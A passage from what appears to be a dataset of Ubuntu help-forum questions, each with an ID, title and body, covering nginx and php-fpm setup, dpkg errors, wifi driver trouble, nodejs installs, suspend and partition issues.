0x7f9338ded94a ] ( ee ) 20 : /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0x7f93368d0ec 5 ] ( ee ) 21 : /usr/bin/x ( 0x7f9338d94000+0x44e7e ) [ 0x7f9338dd8e7e ] ( ee ) ( ee ) [ mi ] these backtraces from mieqenqueue may point to a culprit higher up the stack . ( ee ) [ mi ] mieq is *not* the cause . it is a victim .
507022	how to disable nvidia xserver panning ?	i have just connected my external monitor 1980x1200 to displayport . i have nvidia optimus technology so i had to change into nvidia graphics . monitors are working fine , i just got a problem , that my external monitor pans when i try to go to my main monitor . how can i disable it ? in gui or cli . thank you .
507025	nginx and php5-fpm not working	before anything i searched everywhere and tested everything but still not working i install php5-fpm and nginx when i open localhost in browser i see this page : welcome to nginx ! so its working now configuring php5-fpm with nginx : /etc/php5/fpm/pool.d/www.conf user = www-data group = www-data listen = /var/run/php5-fpm.sock listen.owner = www-data listen.group = www-data pm = dynamic pm.max_children = 5 pm.start_servers = 2 pm.min_spare_servers = 1 pm.max_spare_servers = 3 chdir = / all other lines are commented and this is the nginx conf : upstream php { server unix : /var/run/php5-fpm.socket ; } server { listen 80 default_server ; listen [ : : ] :80 default_server ipv6only=on ; root /usr/share/nginx/html ; index index.html index.htm index.php ; # make site accessible from http : //localhost/ server_name localhost ; location / { # first attempt to serve request as file , then # as directory , then fall back to displaying a 404. try_files $ uri $ uri/ =404 ; # uncomment to enable naxsi on this location # include /etc/nginx/naxsi.rules } # only for nginx-naxsi used with nginx-naxsi-ui : process denied requests # location /requestdenied { # proxy_pass http : //127.0.0.1:8080 ; # } # error_page 404 /404.html ; # redirect server error pages to the static page /50x.html # # error_page 500 502 503 504 /50x.html ; # location = /50x.html { # root /usr/share/nginx/html ; # } # pass the php scripts to fastcgi server listening on 127.0.0.1:9000 # location ~ \.php $ { try_files $ uri =404 ; fastcgi_split_path_info ^ ( .+\.php ) ( /.+ ) $ ; fastcgi_pass unix : /var/run/php5-fpm.sock ; fastcgi_index index.php ; include fastcgi_params ; } # deny access to .htaccess files , if apache 's document root # concurs with nginx 's one # # location ~ /\.ht { # allow all ; # } } the problem is when i try to run php files nginx will download php file instead of executing it
507034	node js project	i want to create a project and i have installed nodejs , and i have installed npm and on the terminal when i write `` express `` it do not make a folder or if it make the `` npm start '' do not have any response . i have taken reference to http : //cwbuecheler.com/web/tutorials/2013/node-express-mongo/ site . i have installed c : \node > npm install -g express in thi way ... now when i do this the /usr/bin/npm there is a already created file which is giving error . can i delete this file or any solution ?
507035	i want to create new hotkey	i want to add a new hotkey , when i press f1 it will do the same as shift+f1 does . i have added a new custom shortcut ( system - > keyboard ) but i do n't know the command to run like we press shift+f1 . thank you .
507038	can i use a bash variable in a sed command ?	i 'm trying to execute a sed command with `` -n '' option . for i in 1 2 3 4 5 ; do maas maas nodes list | grep hostname | cut -d\ '' -f4 | sed -n ' $ ip ' ; done i want it to run sed -n '1p ' then sed -n '2p ' and so on . any idea ?
507040	sub-process /usr/bin/dpkg returned an error code ( 1 ) in ubuntu 14.04	i am installing freeradius-mysql . it just give me an error . errors were encountered while processing : freeradius-mysql i tried so many articles but they could n't help me . reinstalled it many time but no luck . whole output sudo apt-get install freeradius-mysql reading package lists ... done building dependency tree reading state information ... done freeradius-mysql is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y setting up freeradius-mysql ( 2.1.12+dfsg-1.2ubuntu8 ) ... reload : unknown instance : invoke-rc.d : initscript freeradius , action `` force-reload '' failed . dpkg : error processing package freeradius-mysql ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : freeradius-mysql e : sub-process /usr/bin/dpkg returned an error code ( 1 ) after sudo apt-get -- reinstall install freeradius-mysql output : sudo apt-get -- reinstall install freeradius-mysql reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . e : internal error , no file name for freeradius-mysql : amd64
507042	couldnot find other computer on locally connected area	i am using ubuntu 14.04. now i work on a place where many computer are interconnected . sometimes i have to see other computer 's file that are share . but i could not find any idea to see other file . other employee are using window7 and window8 . and they too also counldnot find my pc name too . this gives me really a problem . i need to transfer file on my office using this network and sometime other employee has also need to copy or take file from my computer i.e hared file . is there is not any such way to transfer file on ubuntu 14.04. i can access there ip i.e localhost but could not find computer that are connected on ethernet .
507043	ubuntu 14.04 freezing when logging on	hello i am new to ubuntu . i have created a bootable pendrive and succesfully replaced xp with ubuntu on a pc . i logged on fine and was exploring but when i started firefox the whole system froze , even ctrl alt f1 did n't do anything . i have had to power down and start again and when i now log in i just get the desktop background and nothing else . i tried logging on as guest and this worked fine until i tried to use firefox and the same thing happened . it also freezes when i click on the settings button .
507045	set notify-osd font to the ubuntu font family	i 'm running lubuntu 14.04.1 64 bit . i did n't like xfce-notifyd , so i installed libnotify . however , it does not use the ubuntu font ( i think it uses the sans font ) , and it looks quite ugly because of that . how do i change it ? thanks in advance .
507046	what is the use of recovery mode in ubuntu	i am getting some problem in my ubuntu 12.04 lts desktop edition , it is getting hanged on log in screen . if i remove my network cable and restart the system it is coming but again when i connect the lan cable and use su or sudo terminal is getting hanged and nothing is coming what might be the cause of this problem . so i decided to recover it using the recovery mode ( like system restore in windows ) i have not created or mounted anything . will it solve my problem or what the recovery mode do in ubuntu i mean what is the use of recovery mode in ubuntu .
507049	lenovo y570 laptop does not suspend on ubuntu 14.04	i have a lenovo y570 laptop on ubuntu 14.04 . i have my settings to suspend my laptop whenever i close the lid . however my laptop does n't suspend when i do so . it does n't even suspend when i click on suspend ( in the `` shut down '' menu ) . i tried solution here and it seems that some of my devices are enabled : device s-state status sysfs node -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 1 . p0p1 s4 *disabled 2 . ehc1 s3 *disabled pci:0000:00:1d.0 3 . ehc2 s3 *disabled pci:0000:00:1a.0 4 . hdef s0 *disabled pci:0000:00:1b.0 5 . rp01 s4 *disabled pci:0000:00:1c.0 6 . pxsx s4 *enabled pci:0000:07:00.0 7 . rp02 s4 *disabled pci:0000:00:1c.1 8 . pxsx s3 *disabled pci:0000:08:00.0 9 . rp03 s4 *disabled 10 . pxsx s3 *disabled 11 . rp04 s3 *disabled pci:0000:00:1c.3 12 . pxsx s3 *enabled pci:0000:09:00.0 13 . pxsx s5 *disabled pci:0000:0a:00.0 14 . rp06 s4 *disabled 15 . pxsx s3 *disabled 16 . rp07 s4 *disabled 17 . pxsx s3 *disabled 18 . rp08 s4 *disabled 19 . pxsx s3 *disabled 20 . peg0 s4 *disabled pci:0000:00:01.0 21 . pegp s4 *disabled pci:0000:01:00.0 22 . peg1 s4 *disabled 23 . peg2 s4 *disabled 24 . peg3 s4 *disabled 25 . lid0 s3 *enabled i saw what devices were number 6 and 12 and they are a usb and ethernet controller : 07:00.0 ethernet controller : broadcom corporation netlink bcm57781 gigabit ethernet pcie ( rev 10 ) 09:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) i tried to disable them using sudo acpitool -w number however i ca n't disaable them even as sudo . what do i do ? its a problem as i am not able to suspend my laptop and its drains the battery .
507053	error 1962 : no operating system found after installing 14.04.1 server amd64 on lenovo thinkcentre m81	i got `` error 1962 : no operating system found '' after installing 14.04.1 server amd64 on lenovo thinkcentre m81 . firstly , the installation is finished successfully and ubuntu prompts me to pull out of installation cd . i did it per the prompt . secondly , after error 1962 happens , i checked primary boot sequence in lenovo thinkcenter m81 bios , hdd1 and fdd is in boot sequence . and i changed boot mode from auto to legacy and retry boot , but error 1962 still happens . is there anybody who knows what causes the error 1962 ? thanks
507055	how to get my serial printer to work	i'w tried every tips i have found . i cant get my star termic printer to work . after my win server died , i installed a ubuntu 13. ? server with lamp i have a receipt printer attached to it an here is my win lines witch did work . `mode com2 : baud=19200 parity=n data=8 stop=1 xon=off` ; $ sp = fopen ( `` com2 '' , `` w+ '' ) ; fwrite ( $ sp , '' test '' ) ; fclose ( $ sp ) ; i have configured the baud to 19200 and it do print `` greek '' and a lot of `` ? '' tips anyone ? ? ?
507057	sleep ubuntu server after x time of inactivity	i recently set up an ubuntu 14.04 samba server as a home file server . it will not be getting used but maybe a couple of times a day so i do n't want to have everything powered on while it does n't have to be . it 's an actual rack mount server with bios support for wake over land and i 've managed to make that work when i put it to sleep but i ca n't find any way to schedule sleep . it is a headless server and runs just a command line interface . i want something that will say put the server to sleep after 30 minutes of inactivity , then once it is waked over lan allow it to do its job and then put it back to sleep after 30 minutes of inactivity and so on . is there a way to do this from the command line ?
507059	installing ubuntu on karbonn s11 ( win8 ) tablet	i 've recently bought a win8 karbonn s11 tablet pc and now i want to install ubuntu 14.04.1 lts . the point is that the bios ( windows calls it uefi [ ? ! ] , but it 's certainly bios up to me ) doesnt see the sd card . thats ok , we still got the micro usb port , but it does n't let the installation either . neither by selecting the boot order , nor by selecting the boot override option . not even from the advanced startup option in the settings . the tablet simply ignores the boot image . thanks in advance )
507060	ibus m17n languages not seen in 14.04 gnome-classic	input methods of ibus-m17n ca n't be selected from text entry settings in gnome-classic desktop environment . but it can be selected when logged in to unity . is there a problem between gnome-classic and ibus in 14.04. ? is there a way to fix it or this is a bug in gnome-classic in 14.04. ?
507061	raw file system in windows8 on dual boot system	i have recently installed ubuntu gnome 14.04 along side windows8 . everything works fine but the f : drive ( 487mb ) is shown as raw file system in windows disk manager . also every time i boot into windows , f drive is repaired before windows can actually start . i have given around 525mb of swap space in ubuntu . could this be that space ?
507064	nodejs install issues	whenever i need to use nodejs i 'm always tired of a bunch of problems . at the moment i need to use closurecompiler nodejs module and try to install it and nodejs . it turns me following errors . how do i fix the problem ? i use ubuntu 14.04 before this i use : sudo sudo add-apt-repository ppa : chris-lea/node.js and add other repository . after this i executing : sudo apt-get install nodejs npm reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nodejs : conflicts : npm e : unable to correct problems , you have held broken packages . georgi @ sepulcher : ~ $ sudo apt-get install nodejs reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : nodejs 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/4428 kb of archives . after this operation , 17,7 mb of additional disk space will be used . selecting previously unselected package nodejs . ( reading database ... 175393 files and directories currently installed . ) preparing to unpack ... /nodejs_0.10.30-1chl1~trusty1_amd64.deb ... unpacking nodejs ( 0.10.30-1chl1~trusty1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... setting up nodejs ( 0.10.30-1chl1~trusty1 ) ... georgi @ sepulcher : ~ $ sudo apt-get install npm reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : npm : depends : nodejs but it is not going to be installed depends : node-abbrev ( > = 1.0.4 ) but it is not going to be installed depends : node-ansi but it is not going to be installed depends : node-archy but it is not going to be installed depends : node-block-stream but it is not going to be installed depends : node-fstream ( > = 0.1.22 ) but it is not going to be installed depends : node-fstream-ignore but it is not going to be installed depends : node-github-url-from-git but it is not going to be installed depends : node-glob ( > = 3.1.21 ) but it is not going to be installed depends : node-graceful-fs ( > = 2.0.0 ) but it is not going to be installed depends : node-inherits but it is not going to be installed depends : node-ini ( > = 1.1.0 ) but it is not going to be installed depends : node-lockfile but it is not going to be installed depends : node-lru-cache ( > = 2.3.0 ) but it is not going to be installed depends : node-minimatch ( > = 0.2.11 ) but it is not going to be installed depends : node-mkdirp ( > = 0.3.3 ) but it is not going to be installed depends : node-gyp ( > = 0.10.9 ) but it is not going to be installed depends : node-nopt ( > = 2.1.1 ) but it is not going to be installed depends : node-npmlog but it is not going to be installed depends : node-once but it is not going to be installed depends : node-osenv but it is not going to be installed depends : node-read but it is not going to be installed depends : node-read-package-json ( > = 1.1.0 ) but it is not going to be installed depends : node-request ( > = 2.25.0 ) but it is not going to be installed depends : node-retry but it is not going to be installed depends : node-rimraf ( > = 2.2.2 ) but it is not going to be installed depends : node-semver ( > = 2.1.0 ) but it is not going to be installed depends : node-sha but it is not going to be installed depends : node-slide but it is not going to be installed depends : node-tar ( > = 0.1.18 ) but it is not going to be installed depends : node-which but it is not going to be installed e : unable to correct problems , you have held broken packages .
507067	increase ubuntu partition	i have a sony vaio laptop on which both windows 7 and ubuntu 14.04 are installed . when i installed ubuntu on pre-existing windows , i gave it a partition size of 15gb . now as softwares requires more space i want to increase it to 20gb . i even have unallocated space of 9gb so that is not the problem , but i 'm unable to do so using gparted . no matter how many times i have tried it does not increase past 14363mb .
507069	ubuntu background changer not showing new images in /usr/share/backgrounds	i am using ubuntu 14.04 and i wanted to add some more wallpapers to it . so i copied some wallpapers to /usr/share/backgrounds . but the wallpaper changer ( all settings -- > appearance -- > look ) does not show the new images that i copied . what am i missing ?
507070	there is a file in ~/.cache/deja-dup/.. with 899g size	i am running my mail server on ubuntu which has 1.2 tb in total space . today i realized there was an issue on my mail server , it was refusing sending/receiving mails due to storage which triggers port issues too . first i removed my latest backup which i should n't have done.. , then started to investigate real problem ; ******** @ *** : ~/.cache/deja-dup/8f323f ... ... ... ... /duplicity-full-signatures.20140724t223328z.sigtar.part -rw -- -- -- 1 ******* ******** 899g aug 5 10:02 duplicity-full-signatures.20140724t223328z.sigtar.part what is that file used for ? is it safe to remove it because the size is really really really huge.. 899g..
507073	wifi behaving weird after installing ubuntu 14.04	i am using a compaq presario cq43 laptop . initially i installed ubuntu 12.04 and was using a broadcom wireless sta driver ( bc4313 ) for wi-fi . it was working well , then after three years i installed ubuntu 14.04 . i 'm having trouble with wifi now . it only connects sometimes . after going through the ubuntu forum discussions , i found a remedy . step 1 : go to additional driver under software update select proprietary driver for broadcom if not selected and click apply changes step 2 : sudo apt-get purge bcmwl-kernel-source sudo apt-get install linux-firmware-nonfree step 3 : reboot now the issue is every time i restart my laptop i have to run the above steps and after rebooting the wi-fi works fine . i have updated all the headers and software through software updater using lan connection . # # # # # # # # # # wireless info start # # # # # # # # # # report from : 11 aug 2014 15:33 ist +0530 script from : 04 aug 2014 18:47 utc +0000 # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:12 utc 2014 i686 athlon i686 gnu/linux parameters : ro , quiet , splash , vt.handoff=7 # # # # # desktop # # # # # ubuntu # # # # # lspci # # # # # 06:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : hewlett-packard company device [ 103c:3577 ] kernel driver in use : r8169 07:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:1795 ] kernel driver in use : bcma-pci-bridge # # # # # lsusb # # # # # bus 002 device 002 : id 058f : a001 alcor micro corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : hp-wifi : wireless lan soft blocked : no hard blocked : yes 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : yes # # # # # lsmod # # # # # hp_wmi 13702 0 sparse_keymap 13708 1 hp_wmi wmi 18673 1 hp_wmi b43 356470 0 ssb 51854 1 b43 brcmsmac 529837 0 cordic 12518 1 brcmsmac brcmutil 15066 1 brcmsmac bcma 42043 3 b43 , brcmsmac mac80211 546051 2 b43 , brcmsmac cfg80211 409394 3 b43 , brcmsmac , mac80211 # # # # # interfaces # # # # # auto lo iface lo inet loopback # # # # # ifconfig # # # # # eth0 link encap : ethernet hwaddr inet addr:192.168.0.100 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :461e : a1ff : fec5 : b875/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:231 errors:0 dropped:0 overruns:0 frame:0 tx packets:364 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:136089 ( 136.0 kb ) tx bytes:47961 ( 47.9 kb ) # # # # # iwconfig # # # # # lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : brcmsmac state : unavailable default : no hw address : capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.100 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # iwlist channels # # # # # lo no frequency information . eth0 no frequency information . wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz # # # # # iwlist scan # # # # # wlan0 interface does n't support scanning : network is down lo interface does n't support scanning . eth0 interface does n't support scanning . # # # # # module infos # # # # # [ b43 ] filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/b43/b43.ko firmware : b43/ucode9.fw firmware : b43/ucode5.fw firmware : b43/ucode16_mimo.fw firmware : b43/ucode15.fw firmware : b43/ucode14.fw firmware : b43/ucode13.fw firmware : b43/ucode11.fw license : gpl author : rafał miłecki author : gábor stefanik author : michael buesch author : stefano brivio author : martin langer description : broadcom b43 wireless driver srcversion : 42bae2db9bade3e7eca2cc0 alias : bcma : m04bfid0812rev1dcl* alias : bcma : m04bfid0812rev18cl* alias : bcma : m04bfid0812rev17cl* alias : bcma : m04bfid0812rev11cl* alias : ssb : v4243id0812rev10* alias : ssb : v4243id0812rev0f* alias : ssb : v4243id0812rev0d* alias : ssb : v4243id0812rev0c* alias : ssb : v4243id0812rev0b* alias : ssb : v4243id0812rev0a* alias : ssb : v4243id0812rev09* alias : ssb : v4243id0812rev07* alias : ssb : v4243id0812rev06* alias : ssb : v4243id0812rev05* depends : bcma , ssb , mac80211 , cfg80211 intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : a7 : fc:65:90 : fc:4a:8d:85:9a : ae : bd : a2 : ca:5d : d0:47:16:24:4f : a0 sig_hashalgo : sha512 parm : bad_frames_preempt : enable ( 1 ) / disable ( 0 ) bad frames preemption ( int ) parm : fwpostfix : postfix for the .fw files to load . ( string ) parm : hwpctl : enable hardware-side power control ( default off ) ( int ) parm : nohwcrypt : disable hardware encryption . ( int ) parm : hwtkip : enable hardware tkip . ( int ) parm : qos : enable qos support ( default on ) ( int ) parm : btcoex : enable bluetooth coexistence ( default on ) ( int ) parm : verbose : log message verbosity : 0=error , 1=warn , 2=info ( default ) , 3=debug ( int ) parm : pio : use pio accesses by default : 0=dma , 1=pio ( int ) parm : allhwsupport : enable support for all hardware ( even it if overlaps with the brcmsmac driver ) ( int ) [ ssb ] filename : /lib/modules/3.13.0-32-generic/kernel/drivers/ssb/ssb.ko license : gpl description : sonics silicon backplane driver srcversion : 3de188310f77c566c2e8cb3 alias : pci : v000014e4d00004350sv*sd*bc*sc*i* alias : pci : v000014e4d0000432csv*sd*bc*sc*i* alias : pci : v000014e4d0000432bsv*sd*bc*sc*i* alias : pci : v000014e4d00004329sv*sd*bc*sc*i* alias : pci : v000014e4d00004328sv*sd*bc*sc*i* alias : pci : v000014e4d00004325sv*sd*bc*sc*i* alias : pci : v000014e4d00004324sv*sd*bc*sc*i* alias : pci : v000014e4d0000a8d6sv*sd*bc*sc*i* alias : pci : v000014e4d00004322sv*sd*bc*sc*i* alias : pci : v000014e4d00004321sv*sd*bc*sc*i* alias : pci : v000014e4d00004320sv*sd*bc*sc*i* alias : pci : v000014e4d00004319sv*sd*bc*sc*i* alias : pci : v000014a4d00004318sv*sd*bc*sc*i* alias : pci : v000014e4d00004318sv*sd*bc*sc*i* alias : pci : v000014e4d00004315sv*sd*bc*sc*i* alias : pci : v000014e4d00004312sv*sd*bc*sc*i* alias : pci : v000014e4d00004311sv*sd*bc*sc*i* alias : pci : v000014e4d00004307sv*sd*bc*sc*i* alias : pci : v000014e4d00004306sv*sd*bc*sc*i* alias : pci : v000014e4d00004301sv*sd*bc*sc*i* depends : intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : a7 : fc:65:90 : fc:4a:8d:85:9a : ae : bd : a2 : ca:5d : d0:47:16:24:4f : a0 sig_hashalgo : sha512 [ brcmsmac ] filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/brcm80211/brcmsmac/brcmsmac.ko firmware : brcm/bcm43xx_hdr-0.fw firmware : brcm/bcm43xx-0.fw license : dual bsd/gpl description : broadcom 802.11n wireless lan driver . author : broadcom corporation srcversion : 43d6897f7eb716081df69be alias : bcma : m04bfid0812rev18cl* alias : bcma : m04bfid0812rev17cl* alias : bcma : m04bfid0812rev11cl* depends : bcma , mac80211 , brcmutil , cfg80211 , cordic intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : a7 : fc:65:90 : fc:4a:8d:85:9a : ae : bd : a2 : ca:5d : d0:47:16:24:4f : a0 sig_hashalgo : sha512 [ brcmutil ] filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/brcm80211/brcmutil/brcmutil.ko license : dual bsd/gpl description : broadcom 802.11n wireless lan driver utilities . author : broadcom corporation srcversion : e81ee4cbb6a7a689150d93d depends : intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : a7 : fc:65:90 : fc:4a:8d:85:9a : ae : bd : a2 : ca:5d : d0:47:16:24:4f : a0 sig_hashalgo : sha512 [ bcma ] filename : /lib/modules/3.13.0-32-generic/kernel/drivers/bcma/bcma.ko license : gpl description : broadcom 's specific amba driver srcversion : e41b811d88783dd5bc38565 alias : pci : v000014e4d00004727sv*sd*bc*sc*i* alias : pci : v000014e4d00004365sv*sd*bc*sc*i* alias : pci : v000014e4d00004359sv*sd*bc*sc*i* alias : pci : v000014e4d00004358sv*sd*bc*sc*i* alias : pci : v000014e4d00004357sv*sd*bc*sc*i* alias : pci : v000014e4d00004353sv*sd*bc*sc*i* alias : pci : v000014e4d00004331sv*sd*bc*sc*i* alias : pci : v000014e4d0000a8d8sv*sd*bc*sc*i* alias : pci : v000014e4d00004313sv*sd*bc*sc*i* alias : pci : v000014e4d00000576sv*sd*bc*sc*i* depends : intree : y vermagic : 3.13.0-32-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : a7 : fc:65:90 : fc:4a:8d:85:9a : ae : bd : a2 : ca:5d : d0:47:16:24:4f : a0 sig_hashalgo : sha512 # # # # # module parameters # # # # # [ b43 ] allhwsupport : 0 bad_frames_preempt : 0 btcoex : 1 hwpctl : 0 hwtkip : 0 nohwcrypt : 0 pio : 0 qos : 1 verbose : 2 # # # # # /etc/modules # # # # # lp brcmsmac brcmsmac brcmsmac brcmsmac b43 b43 # # # # # blacklists # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac blacklist b43 blacklist wl blacklist b43 blacklist wl blacklist b43 blacklist wl blacklist b43 blacklist wl blacklist b43 blacklist wl # # # # # udev rules # # # # # # pci device 0x10ec:0x8136 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x14e4:0x4727 ( brcmsmac ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 14.492780 ] bcma : bus0 : found chip with id 0x4313 , rev 0x01 and package 0x08 [ 14.492818 ] bcma : bus0 : core 0 found : chipcommon ( manuf 0x4bf , id 0x800 , rev 0x24 , class 0x0 ) [ 14.492843 ] bcma : bus0 : core 1 found : ieee 802.11 ( manuf 0x4bf , id 0x812 , rev 0x18 , class 0x0 ) [ 14.492889 ] bcma : bus0 : core 2 found : pcie ( manuf 0x4bf , id 0x820 , rev 0x11 , class 0x0 ) [ 14.505581 ] bcma : bus0 : bus registered [ 14.617110 ] brcmsmac bcma0:0 : mfg 4bf core 812 rev 24 class 0 irq 23 [ 14.838616 ] ieee80211 phy0 : registered radio enabled led device : brcmsmac-phy0 : radio gpio : 243 [ 15.165326 ] type=1400 audit ( 1407751129.533:3 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=350 comm= '' apparmor_parser '' [ 15.175540 ] type=1400 audit ( 1407751129.545:5 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=350 comm= '' apparmor_parser '' [ 19.718493 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 131.249919 ] brcmsmac bcma0:0 : brcms_ops_bss_info_changed : qos enabled : false ( implement ) [ 131.249989 ] brcmsmac bcma0:0 : brcms_ops_config : change power-save mode : false ( implement ) [ 131.250768 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 131.737890 ] usb 4-2 : direct firmware load failed with error -2 [ 131.739884 ] bluetooth : ca n't load firmware , may not work correctly [ 133.207205 ] wlan0 : authenticate with [ 133.210575 ] wlan0 : send auth to ( try 1/3 ) [ 133.238251 ] wlan0 : send auth to ( try 2/3 ) [ 133.333829 ] wlan0 : send auth to ( try 3/3 ) [ 133.432728 ] wlan0 : authentication with timed out # # # # # # # # # # wireless info end # # # # # # # # # # # #
507076	adobe flash player	i installed adobe flashplugin-installer 11.2.202.378ubuntu0.12.04.1 from the ubuntu software centre in my computer bt still i can not watch videos online.what could be the issue . can somebody propose a remedy ? thanks folks .
507077	how do you get c++ to compile from code : :blocks ? ( beginner to linux )	so i just recently installed linux after using windows for my whole life . i also just installed the c++ ide named code : :blocks using the following command in the terminal : sudo apt-get install codeblocks now whenever i try to run some source code i get this error sh:1 /home/daniel/desktop/hey : permission denied any help/solution ?
507078	[ solved ] will ubuntu be faster in gnome	i recently installed ubuntu 14.04 lts on my old pc having 2gb ram pentium 4 processor 3.04ghz 6gb swap but still it works very slow like hell . if i install gnome classic then it will be fast or not ?
